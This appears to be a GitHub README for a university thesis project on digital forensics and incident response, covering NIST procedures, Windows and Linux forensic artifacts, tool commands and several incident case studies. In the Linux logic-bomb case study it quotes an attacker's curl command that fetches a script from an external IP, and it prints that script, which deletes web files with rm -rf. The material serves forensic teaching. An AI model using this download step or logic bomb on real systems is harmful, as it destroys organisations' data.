Operations in Cyber Defence - II

Digital Forensics & Incident Response (DFIR) Implementation

M.Sc. IT IMS & CS (Integrated) | Gujarat University | May 2023

---

📋 Project Overview

Objective

This project demonstrates Digital Forensics and Incident Response (DFIR) methodologies in enterprise Security Operations Centers, focusing on evidence collection, analysis, and systematic incident handling procedures for effective cyber incident investigation and response.

Key Highlights

• ✅ Digital Forensics Investigation: Complete forensic process from identification to presentation.
• ✅ Evidence Handling: Chain of custody, data integrity, and attack attribution (MITRE ATT&CK).
• ✅ Incident Response: NIST SP 800-61 CSIH lifecycle implementation.
• ✅ SOC Integration: SOAR, SIEM, EDR/XDR deployment for automated response.
• ✅ Real Case Studies: Linux forensics investigation and incident handling audits.
• ✅ OS Forensics: Windows Registry, file system, and Linux artifacts analysis.

Scope

Core Problem Addressed: As cyber incidents increase, organizations need structured DFIR capabilities to investigate breaches, preserve evidence, and develop effective remediation strategies.

Focus Areas:

• Digital forensics investigation methodology and evidence collection
• Incident response planning and lifecycle (NIST framework)
• Windows and Linux forensic artifact identification
• SOC implementation of DFIR tools (SOAR, SIEM, EDR/XDR)
• Attack attribution using MITRE ATT&CK framework
• Real-world case investigations and incident handling procedures

---

🎯 Learning Outcomes

This project demonstrates proficiency in:

Technical Skills

• Digital Forensics: Evidence identification, acquisition, examination, analysis, and reporting.
• Incident Response: Detection, containment, eradication, recovery, and post-incident activities.
• Forensic Tools: Autopsy, FTK Imager, Volatility, Eric Zimmerman's tools, Wireshark.
• OS Forensics: Windows Registry analysis, file system forensics, Linux log analysis.
• Evidence Management: Chain of custody, data integrity verification, legal admissibility.
• Attack Attribution: Threat actor profiling using MITRE ATT&CK TTPs.
• SOC Operations: SOAR orchestration, SIEM correlation, EDR/XDR deployment.

Security Domains

• Digital forensic investigation processes
• Computer security incident response (CSIRT operations)
• Network and memory forensics
• Malware analysis and reverse engineering
• Legal and compliance (evidence handling, expert witness testimony)
• Threat intelligence and IOC extraction

Professional Competencies

• NIST SP 800-61 incident handling procedures
• Evidence documentation and court admissibility
• Forensic reporting and expert testimony
• Compliance frameworks (CMMC, GDPR, legal requirements)
• Cross-functional team coordination (legal, IT, management)

---

📚 Project Structure

Section 1: Understanding Digital Forensics & Incident Response (Pages 1-53)

Digital Forensics (Pages 2-16):

• Classification: Disk, Network, Memory, Malware, Email, Mobile forensics
• Investigation methodology and evidence types
• Chain of custody and data preservation
• Attack attribution using MITRE ATT&CK
• Legal considerations and expert witness requirements

Incident Response (Pages 17-53):

• NIST SP 800-61 lifecycle (Preparation, Detection, Containment, Recovery)
• CSIRT team structure and stakeholder coordination
• Incident handling checklist and SOPs
• Windows and Linux IR templates
• Post-incident activities and lessons learned

Section 2: SOC Implementation of DFIR (Pages 54-79)

Digital Forensics Toolkit (Pages 54-56):

• Network analysis (Wireshark, NetworkMiner)
• Registry analysis (RegRipper, ShellBags Explorer)
• Memory forensics (Volatility, Magnet RAM Capture)
• Disk analysis (FTK Imager, Sleuth Kit, Autopsy)

Windows Forensics Artifacts (Pages 57-71):

• Registry hives analysis (HKLM, HKCU, SAM, NTUSER.DAT)
• File system forensics (NTFS, MFT, USN Journal, Volume Shadow Copy)
• Evidence of execution (Prefetch, ShimCache, AmCache, BAM/DAM)
• USB device tracking and external media forensics

Linux Forensics Artifacts (Pages 71-74):

• System configuration (/etc/passwd, sudoers, network interfaces)
• Authentication logs (wtmp, btmp, auth.log)
• Persistence mechanisms (cron jobs, .bashrc, service startups)
• Evidence of execution (bash_history, .viminfo, sudo logs)

SOC IR Systems (Pages 75-77):

• SOAR platforms (Splunk, Palo Alto Cortex XSOAR)
• SIEM solutions (IBM QRadar, Splunk, LogRhythm)
• EDR/XDR tools (CrowdStrike Falcon, Microsoft Defender)
• UEBA systems (ManageEngine, Rapid7 InsightIDR)

Section 3: Case Study - Linux Forensics Investigation (Pages 80-86)

• Real-world scenario: Disgruntled IT employee logic bomb
• Evidence collection from Linux system
• Timeline reconstruction using auth logs and bash history
• Malicious script identification and cronjob analysis
• Security recommendations post-investigation

Section 4: Case Study - Incident Handling Audits (Pages 87-93)

Scenario 1: Worm and DDoS agent infestation in investment firm Scenario 2: Unauthorized access to payroll records in hospital

• Per-phase audit questionnaires (Preparation → Post-Incident)
• Response procedures following NIST framework
• Stakeholder coordination and communication plans

---

🛠️ Tools & Technologies

Digital Forensics Tools

Tool	Category	Purpose
Autopsy	Disk Analysis	Open-source digital forensics platform
FTK Imager	Disk Imaging	Forensic disk image acquisition
Volatility	Memory Forensics	RAM dump analysis
Wireshark	Network Forensics	Packet capture and analysis
Eric Zimmerman's Tools	Windows Artifacts	Registry, MFT, Prefetch, Jumplists parsers
Sleuth Kit	File System Analysis	File system forensic analysis toolkit
RegRipper	Registry Analysis	Windows Registry parsing

Incident Response Tools

Tool	Category	Purpose
Splunk SOAR	Orchestration	Security automation and response
IBM QRadar	SIEM	Security information and event management
CrowdStrike Falcon	EDR/XDR	Endpoint detection and response
Kali Linux	IR Toolkit	Penetration testing and IR distribution
SANS SIFT	Forensic Workstation	Digital forensics and IR environment
Redline	Memory Analysis	Memory and file analysis
MISP	Threat Intelligence	Malware information sharing platform

Analysis Tools

Tool	Category	Purpose
MFTECmd	File System	$MFT, $Boot, $J parser
PECmd	Prefetch	Windows Prefetch file parser
JLECmd	Jump Lists	Windows Jump Lists analysis
LECmd	Shortcuts	LNK file analysis
DB Browser for SQLite	Database	SQLite database examination
AmcacheParser	Execution	AmCache.hve parsing

---

🔬 Lab Setup

Environment

• Virtualization: VMware Workstation 16 Pro
• Forensic Workstation: SANS SIFT, Kali Linux 2021
• Analysis OS: Windows 10, Ubuntu 20.04
• Test Scenarios: Isolated lab with compromised systems

Base Requirements

Hardware:

CPU: 8+ cores (forensic analysis workload)
RAM: 32GB minimum (64GB for memory forensics)
Storage: 2TB+ (disk images, evidence storage)

Software Stack:

Forensics:
  - Autopsy 4.x
  - FTK Imager
  - Eric Zimmerman's Tools
  - Volatility 2.x/3.x
  
Incident Response:
  - SIEM: Splunk, ELK Stack
  - SOAR: Splunk SOAR
  - EDR: CrowdStrike Falcon
  
OS Analysis:
  - SANS SIFT Workstation
  - Kali Linux
  - REMnux (malware analysis)

Investigation Setup

Evidence Collection
       ↓
Forensic Imaging (Write-Blocked)
       ↓
Hash Verification (SHA-256)
       ↓
Working Copy Creation
       ↓
Analysis Environment (Isolated)
       ↓
Artifact Extraction & Timeline
       ↓
Report Generation

---

✨ Features Implemented

1. Digital Forensics Investigation Process

NIST SP 800-86 Four-Phase Process:

Collection
  ├─ Identify potential sources of data
  ├─ Use write-blockers for acquisition
  ├─ Create forensic images (dd, FTK Imager)
  └─ Document chain of custody

Examination
  ├─ Extract relevant information
  ├─ Decompress/decrypt data
  ├─ Remove irrelevant data
  └─ Identify actual evidence

Analysis
  ├─ Draw conclusions from evidence
  ├─ Correlate data from multiple sources
  ├─ Document timeline of events
  └─ Identify salient features

Reporting
  ├─ Prepare detailed findings
  ├─ Present impartial conclusions
  ├─ Document limitations
  └─ Provide recommendations

Evidence Collection Priority (RFC 3227):

1. Memory registers, caches
2. Routing tables, ARP cache, RAM
3. Temporary file systems
4. Non-volatile storage (HDD, SSD)
5. Remote logging data
6. Physical topology
7. Archival media

2. Windows Forensic Artifacts

Registry Analysis:

Key Hive Locations:

System Hives:
  C:\Windows\System32\Config\
    ├─ DEFAULT
    ├─ SAM
    ├─ SECURITY
    ├─ SOFTWARE
    └─ SYSTEM

User Hives:
  C:\Users\<username>\
    ├─ NTUSER.DAT
    └─ AppData\Local\Microsoft\Windows\
        └─ USRCLASS.DAT

Critical Registry Keys:

Artifact	Location	Information
OS Version	SOFTWARE\Microsoft\Windows NT\CurrentVersion	Build, version, install date
Computer Name	SYSTEM\CurrentControlSet\Control\ComputerName	Machine identification
Time Zone	SYSTEM\CurrentControlSet\Control\TimeZoneInformation	System timezone
Network Interfaces	SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces	IP config, DHCP
USB Devices	SYSTEM\CurrentControlSet\Enum\USBSTOR	Connected USB history
AutoRuns	SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Startup programs
Recent Files	NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs	User file access
UserAssist	NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist	Program execution stats

File System Forensics:

NTFS Master File Table ($MFT):

Critical MFT Files:
  $MFT         → Directory of all files
  $LOGFILE     → Transactional logging
  $UsnJrnl     → Change journal (file modifications)
  $BITMAP      → Cluster allocation status

Evidence of Execution:

• Prefetch Files: C:\Windows\Prefetch*.pf (execution count, last run time)
• ShimCache: SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
• AmCache: C:\Windows\appcompat\Programs\Amcache.hve
• BAM/DAM: SYSTEM\CurrentControlSet\Services\bam\UserSettings{SID}
• Jump Lists: C:\Users<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations

Analysis Commands:

# Parse MFT
MFTECmd.exe -f C:\$MFT --csv output.csv

# Parse Prefetch
PECmd.exe -d C:\Windows\Prefetch --csv output.csv

# Parse Registry
RECmd.exe -d C:\Windows\System32\Config --bn BatchExample.reb

# Parse Jump Lists
JLECmd.exe -d "C:\Users\username\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations" --csv output.csv

3. Linux Forensic Artifacts

System Information:

# OS Release
cat /etc/os-release

# User Accounts
cat /etc/passwd
cat /etc/shadow  # (requires root)

# Sudo Privileges
sudo cat /etc/sudoers

# Network Config
cat /etc/network/interfaces
ip address show
cat /etc/hosts
cat /etc/resolv.conf

Authentication & Logs:

# Login History
sudo last -f /var/log/wtmp     # Successful logins
sudo last -f /var/log/btmp     # Failed logins

# Authentication Logs
cat /var/log/auth.log | tail
cat /var/log/secure  # (RHEL/CentOS)

# System Logs
cat /var/log/syslog | head
cat /var/log/messages  # (RHEL/CentOS)

Evidence of Execution:

# Bash History
cat ~/.bash_history
cat /root/.bash_history

# Vim History
cat ~/.viminfo

# Sudo Commands
cat /var/log/auth.log* | grep -i COMMAND

# Running Processes
ps aux
ps -ef

# Open Files by Process
lsof -p <PID>

# Network Connections
netstat -natp
ss -tulpn

Persistence Mechanisms:

# Cron Jobs
cat /etc/crontab
ls /etc/cron.*
crontab -u root -l

# Startup Services
ls /etc/init.d/
systemctl list-unit-files --type=service

# RC Files
cat ~/.bashrc
cat /etc/bash.bashrc
cat /etc/profile

4. Incident Response Lifecycle

NIST SP 800-61 Implementation:

Phase 1: Preparation

• CSIRT team establishment and training
• Incident response plan development
• Tool acquisition (jump kit preparation)
• Communication protocols establishment
• Risk assessment and control implementation

Phase 2: Detection and Analysis

Attack Vectors:

• Web-based attacks
• Email (phishing, malware attachments)
• Lost/stolen devices
• Impersonation/social engineering
• Attrition (brute force)
• Removable media

Signs of Incident:

• Precursors: Port scans, vulnerability announcements, threats
• Indicators: Antivirus alerts, unusual files, bounced emails, network anomalies

Analysis Steps:

1. Validate Incident
   └─ Correlate multiple indicators

2. Scope Investigation
   ├─ Identify affected systems
   ├─ Determine attack origin
   └─ Assess initial impact

3. Prioritize Incident
   ├─ Functional impact (service disruption)
   ├─ Information impact (data breach)
   └─ Recoverability effort

4. Notify Stakeholders
   └─ Management, legal, affected parties

Phase 3: Containment, Eradication, Recovery

Containment Strategy:

• Short-term: Isolate affected systems
• Long-term: Rebuild clean systems
• Evidence preservation during containment

Eradication:

• Remove malware and malicious accounts
• Identify and patch exploited vulnerabilities
• Validate all affected systems identified

Recovery:

• Restore from clean backups
• Rebuild compromised systems from scratch
• Implement additional monitoring
• Update security controls

Phase 4: Post-Incident Activities

Lessons Learned Meeting:

Questions to Address:
- What happened and when?
- How well did staff perform?
- Were procedures followed?
- What information was needed sooner?
- What would we do differently?
- How can we prevent recurrence?
- What additional tools are needed?

Incident Documentation:

• Timeline of events
• Actions taken
• Evidence collected
• Root cause analysis
• Remediation steps
• Cost assessment

5. SOAR Implementation

Security Orchestration Capabilities:

Automated Workflows:
  ├─ Alert Enrichment
  │   └─ Threat intelligence lookup
  │   └─ WHOIS/DNS queries
  │   └─ File reputation checks
  │
  ├─ Incident Response
  │   └─ Auto-isolation of compromised hosts
  │   └─ User account disablement
  │   └─ Firewall rule updates
  │
  └─ Case Management
      └─ Ticket creation (ITSM integration)
      └─ Evidence collection
      └─ Stakeholder notification

Playbook Example - Malware Detection:

Trigger: Antivirus alert
  ↓
1. Enrich Alert
   - Query VirusTotal
   - Check MISP database
   - Lookup file hash in Talos
  ↓
2. Containment
   - Isolate endpoint from network
   - Disable user account
   - Block hash at firewall
  ↓
3. Investigation
   - Collect memory dump
   - Extract running processes
   - Capture network connections
  ↓
4. Notification
   - Create JIRA ticket
   - Email SOC manager
   - Update case management system

6. MITRE ATT&CK Attribution

Mapping Observed TTPs:

Tactic	Technique	ID	Evidence
Initial Access	Phishing	T1566	Malicious email attachment
Execution	User Execution	T1204	Victim opened file
Persistence	Scheduled Task/Job	T1053	Cron job created
Privilege Escalation	Sudo/Su	T1169	Added user to sudoers
Defense Evasion	File Deletion	T1070.004	Renamed malicious script
Discovery	System Information Discovery	T1082	Ran ps, netstat commands
Collection	Data from Local System	T1005	Accessed sensitive files
Command and Control	Remote File Copy	T1105	Downloaded script via curl

---

🔄 Process Flow

Digital Forensics Workflow

Incident Occurs
       ↓
First Responder Actions
  ├─ Secure scene
  ├─ Document initial state
  └─ Notify CSIRT
       ↓
Evidence Identification
  ├─ Volatile data (memory, network)
  ├─ Non-volatile data (disk, logs)
  └─ Physical evidence (devices)
       ↓
Evidence Collection
  ├─ Write-blocked imaging
  ├─ Memory dump acquisition
  ├─ Network packet capture
  └─ Hash verification (SHA-256)
       ↓
Evidence Preservation
  ├─ Chain of custody documentation
  ├─ Secure storage (evidence bags)
  └─ Access logging
       ↓
Forensic Examination
  ├─ Create working copy
  ├─ Extract artifacts
  ├─ Recover deleted files
  └─ Timeline creation
       ↓
Analysis & Correlation
  ├─ Identify IOCs
  ├─ Reconstruct events
  ├─ Attribute attack
  └─ Assess impact
       ↓
Reporting
  ├─ Technical report
  ├─ Executive summary
  ├─ Court testimony (if required)
  └─ Recommendations

Incident Response Workflow

Alert Generation (SIEM/EDR)
       ↓
Triage (Tier 1)
  ├─ Validate alert
  ├─ Categorize incident
  ├─ Assign priority
  └─ Decision: Escalate or Close
       ↓
Investigation (Tier 2)
  ├─ Collect evidence
  ├─ Analyze indicators
  ├─ Determine scope
  └─ Containment recommendation
       ↓
Containment Strategy
  ├─ Short-term: Isolate systems
  ├─ Long-term: Patch vulnerabilities
  └─ Evidence preservation
       ↓
Eradication
  ├─ Remove malware
  ├─ Delete malicious accounts
  ├─ Patch exploited vulnerabilities
  └─ Verify complete removal
       ↓
Recovery
  ├─ Restore from backups
  ├─ Rebuild compromised systems
  ├─ Verify functionality
  └─ Enhanced monitoring
       ↓
Post-Incident
  ├─ Lessons learned meeting
  ├─ Update procedures
  ├─ Improve defenses
  └─ Document for compliance

---

📊 Practical Demonstrations

Case Study 1: Linux Logic Bomb Investigation

Scenario: Disgruntled IT employee at CyberT planted logic bomb

Investigation Timeline:

December 28, 06:19:01 - Initial Activity
  └─ User 'cybert' installed dokuwiki package
      Evidence: /var/log/auth.log

December 28, 06:26:53 - User Creation
  └─ Created new user 'it-admin'
      Command: useradd it-admin
      Evidence: /var/log/auth.log

December 28, 06:27:34 - Privilege Escalation
  └─ Added 'it-admin' to sudoers
      Command: visudo
      Evidence: /var/log/auth.log

December 28, 06:29:14 - Malicious Script Download
  └─ Downloaded bomb.sh from external server
      Command: curl 10.10.158.38:8080/bomb.sh -output bomb.sh
      Evidence: /home/it-admin/.bash_history

December 28, 06:29:xx - File Rename & Move
  └─ Renamed to os-update.sh and moved to /bin
      Evidence: /home/it-admin/.viminfo

December 28, 06:31:xx - Persistence Established
  └─ Added script to cron job for execution at 8 AM
      Evidence: /etc/crontab

Forensic Artifacts Analyzed:

Artifact	Location	Finding
Auth Logs	/var/log/auth.log	User creation, sudo usage, package installation
Bash History	~/.bash_history	Downloaded malicious script via curl
Vim Info	~/.viminfo	File editing history (renamed bomb.sh)
Crontab	/etc/crontab	Scheduled task for malicious script
Script Content	/bin/os-update.sh	Logic bomb: deletes files if no login in 30 days

Malicious Script Analysis:

#!/bin/bash
# Logic bomb condition
OUTPUT=$(last | grep it-admin | head -1 | awk '{print $NF}')
if [ "$OUTPUT" -gt 30 ]; then
    rm -rf /var/www/dokuwiki/*
    echo "Goodbye from your friendly IT admin!" > /var/www/goodbye.txt
fi

Key Findings:

• Motive: Revenge/sabotage
• Method: Logic bomb triggered by login inactivity
• Impact: Potential deletion of DokuWiki installation
• Attribution: Confirmed via command history and log correlation

Remediation Actions:

1. ✅ Removed malicious user account it-admin
2. ✅ Deleted script /bin/os-update.sh
3. ✅ Removed cron job entry
4. ✅ Audited all user accounts for unauthorized additions
5. ✅ Reviewed sudo access logs
6. ✅ Implemented enhanced monitoring on privileged commands

Case Study 2: Incident Handling Audit - Worm Infestation

Scenario: Investment firm infected with worm via removable media, DDoS agent installed

Incident Response Audit Questions:

Preparation Phase:

• ✓ Incident response plan documented?
• ✓ CSIRT team trained and equipped?
• ✓ Backup systems tested and verified?
• ✓ Critical systems identified and prioritized?
• ✓ Communication plan established?
• ✓ Jump kit prepared with forensic tools?

Detection and Analysis:

• How was infection initially detected?
• What systems are affected?
• Are critical systems compromised?
• Extent of damage assessment?
• Threat severity classification?
• Have antivirus signatures been updated?

Containment:

• Have infected systems been isolated?
• Are shares and removable media access disabled?
• Is network segmentation enforced?
• Are admin passwords rotated?

Eradication and Recovery:

• Has worm been removed from all systems?
• Are exploited vulnerabilities patched?
• Have systems been restored from clean backups?
• Is DDoS agent completely eradicated?

Post-Incident:

• Lessons learned meeting conducted?
• IR plan updated with findings?
• Employees notified and trained?
• Follow-up assessments scheduled?

Case Study 3: Payroll Data Breach

Scenario: Unknown person accessed unlocked workstation with payroll system open

Response Procedures:

Immediate Actions (0-1 hour):

1. Isolate workstation from network
2. Disable compromised user account
3. Document current state (photos, screenshots)
4. Notify CSIRT and legal team
5. Preserve volatile memory (RAM dump)

Investigation (1-24 hours):

1. Forensic imaging of workstation
2. Review security camera footage
3. Analyze Windows Event Logs
   - Security log (Event ID 4624: Logon)
   - Application log (Payroll system access)
4. Check payroll system audit logs
5. Interview administrator and witnesses

Evidence Collection:

Windows Artifacts:
  - Prefetch files (recent program execution)
  - Recent documents (payroll files accessed)
  - Browser history (web-based payroll access)
  - Registry UserAssist (GUI program usage)
  - Event logs (authentication, process creation)

Network Evidence:
  - Firewall logs (outbound connections)
  - Proxy logs (data exfiltration attempts)
  - DHCP logs (device identification)

Findings Documentation:

• Actions performed on payroll system
• Data accessed/exfiltrated
• Time window of unauthorized access
• Attribution (physical security footage)

---

📖 References

Official Standards & Frameworks

• NIST SP 800-61 Rev 2: Computer Security Incident Handling Guide
• NIST SP 800-86: Guide to Integrating Forensic Techniques into Incident Response
• RFC 3227: Guidelines for Evidence Collection and Archiving
• MITRE ATT&CK Framework: Adversary tactics and techniques
• ISO/IEC 27037: Guidelines for identification, collection, and preservation of digital evidence
• SANS DFIR: Digital Forensics and Incident Response resources

Tool Documentation

• Autopsy: https://www.sleuthkit.org/autopsy/
• Volatility: https://www.volatilityfoundation.org/
• Eric Zimmerman's Tools: https://ericzimmerman.github.io/
• SANS SIFT Workstation: https://www.sans.org/tools/sift-workstation/
• FTK Imager: https://www.exterro.com/ftk-imager
• The Sleuth Kit: https://www.sleuthkit.org/
• RegRipper: https://github.com/keydet89/RegRipper3.0

SOAR/SIEM/EDR Platforms

• Splunk SOAR: https://www.splunk.com/soar
• IBM QRadar: https://www.ibm.com/qradar
• CrowdStrike Falcon: https://www.crowdstrike.com/
• Palo Alto Cortex XSOAR: https://www.paloaltonetworks.com/cortex/xsoar
• Microsoft Defender: https://www.microsoft.com/security/

Training Platforms

• TryHackMe: https://tryhackme.com/ (DFIR labs and scenarios)
• Cisco NetAcad: https://netacad.com/ (Cyber Operations course)
• SANS Cyber Ranges: Incident response simulations

Community Resources

• DFIR Community: https://www.reddit.com/r/computerforensics/
• DFIR Discord/Slack: Community support and knowledge sharing
• Forensics Wiki: https://forensicswiki.xyz/

---

📝 Developer Notes

Project Context

This is the second part of a two-part academic research thesis on cyber defense operations. Part I focused on proactive defense (SOC, NSM, Threat Intel), while Part II focuses on reactive response (DFIR, Incident Handling).

Academic Details:

• Institution: Gujarat University
• Program: M.Sc. IT IMS & CS (Integrated) - Semester 8
• Mentor: Satender Kumar
• Submission: May 13, 2023

Ethical & Legal Considerations

✅ Authorized Investigation: All case studies conducted in controlled lab environments
✅ Evidence Handling: Strict chain of custody protocols followed
✅ Legal Compliance: NIST, RFC, and ISO standards adhered to
✅ Educational Purpose: Focus on forensic methodology and incident response procedures
✅ No Real Breaches: Case studies based on simulated scenarios

Limitations

• Lab environment may not reflect complexity of real-world enterprise incidents
• Tools and techniques subject to updates (as of May 2023)
• Case studies based on simplified scenarios for educational purposes
• Legal testimony requirements vary by jurisdiction
• Some forensic tools require commercial licenses for production use

Important Disclaimers

Digital Forensics:

• Always work on forensic copies, never original evidence
• Maintain detailed chain of custody documentation
• Hash verification (SHA-256) is mandatory for evidence integrity
• Legal admissibility requires following proper procedures
• Consider hiring legal counsel for court cases

Incident Response:

• Follow organization's IR plan and legal requirements
• Preserve evidence even during containment activities
• Document all actions with timestamps
• Coordinate with legal, HR, and management
• Consider regulatory reporting requirements (GDPR, HIPAA, etc.)

---

👤 Developed and Maintained By

Derick Dmello
M.Sc. IT IMS & CS (Integrated)
Gujarat University

Connect:

• GitHub: @mello-io
• LinkedIn: dmelloderick

---

About

A comprehensive academic project demonstrating Digital Forensics and Incident Response (DFIR) implementation in Security Operations Centers, with focus on evidence collection, analysis, and systematic incident handling procedures.

License

This academic project report is submitted for educational purposes as part of the M.Sc. IT IMS & CS program at Gujarat University.

Copyright © 2026 Derick Gabriel Dmello. All rights reserved.

---

Keywords: Digital-Forensics Incident-Response DFIR SOC NIST-SP-800-61 Evidence-Collection Windows-Forensics Linux-Forensics Autopsy FTK-Imager Volatility SOAR SIEM EDR-XDR MITRE-ATTACK Chain-of-Custody Forensic-Analysis Incident-Handling CSIRT Threat-Attribution